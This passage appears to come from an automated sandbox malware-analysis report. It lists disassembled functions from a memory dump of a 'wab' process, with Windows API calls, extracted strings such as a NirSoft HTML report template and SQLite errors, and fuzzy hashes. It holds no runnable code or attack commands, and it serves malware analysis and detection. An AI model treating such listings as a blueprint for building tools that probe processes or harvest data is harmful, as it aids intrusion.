                                                            • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                            • GetDesktopWindow.USER32 ref: 0040D9FD
                                                            • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                            • memset.MSVCRT ref: 0040DA23
                                                            • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                            • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                            • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                              • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                            • String ID: caption
                                                            • API String ID: 973020956-4135340389
                                                            • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                            • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                            • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                            • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                            • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                            • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                            • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset$_snwprintf$wcscpy
                                                            • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                            • API String ID: 1283228442-2366825230
                                                            • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                            • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                            • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                            • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • wcschr.MSVCRT ref: 00413972
                                                            • wcscpy.MSVCRT ref: 00413982
                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                            • wcscpy.MSVCRT ref: 004139D1
                                                            • wcscat.MSVCRT ref: 004139DC
                                                            • memset.MSVCRT ref: 004139B8
                                                              • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                              • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                            • memset.MSVCRT ref: 00413A00
                                                            • memcpy.MSVCRT ref: 00413A1B
                                                            • wcscat.MSVCRT ref: 00413A27
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                            • String ID: \systemroot
                                                            • API String ID: 4173585201-1821301763
                                                            • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                            • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                            • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                            • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: wcscpy
                                                            • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                            • API String ID: 1284135714-318151290
                                                            • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                            • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                            • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                            • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                            • String ID: 0$6
                                                            • API String ID: 4066108131-3849865405
                                                            • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                            • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                            • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                            • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 004082EF
                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                            • memset.MSVCRT ref: 00408362
                                                            • memset.MSVCRT ref: 00408377
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset$ByteCharMultiWide
                                                            • String ID:
                                                            • API String ID: 290601579-0
                                                            • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                            • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                            • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                            • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memchrmemset
                                                            • String ID: PD$PD
                                                            • API String ID: 1581201632-2312785699
                                                            • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                            • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                            • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                            • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                            • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                            • GetDC.USER32(00000000), ref: 00409F6E
                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                            • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                            • GetParent.USER32(?), ref: 00409FA5
                                                            • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                            • String ID:
                                                            • API String ID: 2163313125-0
                                                            • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                            • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                            • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                            • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??3@$wcslen
                                                            • String ID:
                                                            • API String ID: 239872665-3916222277
                                                            • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                            • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                            • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                            • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpywcslen$_snwprintfmemset
                                                            • String ID: %s (%s)$YV@
                                                            • API String ID: 3979103747-598926743
                                                            • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                            • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                            • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                            • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                            • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                            • wcslen.MSVCRT ref: 0040A6B1
                                                            • wcscpy.MSVCRT ref: 0040A6C1
                                                            • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                            • wcscpy.MSVCRT ref: 0040A6DB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                            • String ID: Unknown Error$netmsg.dll
                                                            • API String ID: 2767993716-572158859
                                                            • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                            • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                            • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                            • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                            • wcscpy.MSVCRT ref: 0040DAFB
                                                            • wcscpy.MSVCRT ref: 0040DB0B
                                                            • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                              • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfilewcscpy$AttributesFileString
                                                            • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                            • API String ID: 3176057301-2039793938
                                                            • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                            • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                            • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                            • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            • cannot ATTACH database within transaction, xrefs: 0042F663
                                                            • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                            • database is already attached, xrefs: 0042F721
                                                            • out of memory, xrefs: 0042F865
                                                            • database %s is already in use, xrefs: 0042F6C5
                                                            • unable to open database: %s, xrefs: 0042F84E
                                                            • too many attached databases - max %d, xrefs: 0042F64D
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpymemset
                                                            • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                            • API String ID: 1297977491-2001300268
                                                            • Opcode ID: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                                            • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                            • Opcode Fuzzy Hash: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                                            • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                            • memcpy.MSVCRT ref: 0040EB80
                                                            • memcpy.MSVCRT ref: 0040EB94
                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                              • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                            • String ID: ($d
                                                            • API String ID: 1140211610-1915259565
                                                            • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                            • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                            • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                            • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                            • Sleep.KERNEL32(00000001), ref: 004178E9
                                                            • GetLastError.KERNEL32 ref: 004178FB
                                                            • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: File$ErrorLastLockSleepUnlock
                                                            • String ID:
                                                            • API String ID: 3015003838-0
                                                            • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                            • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                            • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                            • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 00407E44
                                                            • memset.MSVCRT ref: 00407E5B
                                                            • _mbscpy.MSVCRT ref: 00407E7E
                                                            • _mbscpy.MSVCRT ref: 00407ED7
                                                            • _mbscpy.MSVCRT ref: 00407EEE
                                                            • _mbscpy.MSVCRT ref: 00407F01
                                                            • wcscpy.MSVCRT ref: 00407F10
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                            • String ID:
                                                            • API String ID: 59245283-0
                                                            • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                            • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                            • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                            • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                            • GetLastError.KERNEL32 ref: 0041855C
                                                            • Sleep.KERNEL32(00000064), ref: 00418571
                                                            • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                            • GetLastError.KERNEL32 ref: 0041858E
                                                            • Sleep.KERNEL32(00000064), ref: 004185A3
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                                            • String ID:
                                                            • API String ID: 3467550082-0
                                                            • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                            • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                            • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                            • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                            • API String ID: 3510742995-3273207271
                                                            • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                            • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                            • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                            • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                            • memset.MSVCRT ref: 00413ADC
                                                            • memset.MSVCRT ref: 00413AEC
                                                              • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                            • memset.MSVCRT ref: 00413BD7
                                                            • wcscpy.MSVCRT ref: 00413BF8
                                                            • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                            • String ID: 3A
                                                            • API String ID: 3300951397-293699754
                                                            • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                            • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                            • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                            • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                            • wcscpy.MSVCRT ref: 0040D1B5
                                                              • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                              • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                            • wcslen.MSVCRT ref: 0040D1D3
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                            • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                            • memcpy.MSVCRT ref: 0040D24C
                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                            • String ID: strings
                                                            • API String ID: 3166385802-3030018805
                                                            • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                            • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                            • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                            • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 00411AF6
                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                            • wcsrchr.MSVCRT ref: 00411B14
                                                            • wcscat.MSVCRT ref: 00411B2E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: FileModuleNamememsetwcscatwcsrchr
                                                            • String ID: AE$.cfg$General$EA
                                                            • API String ID: 776488737-1622828088
                                                            • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
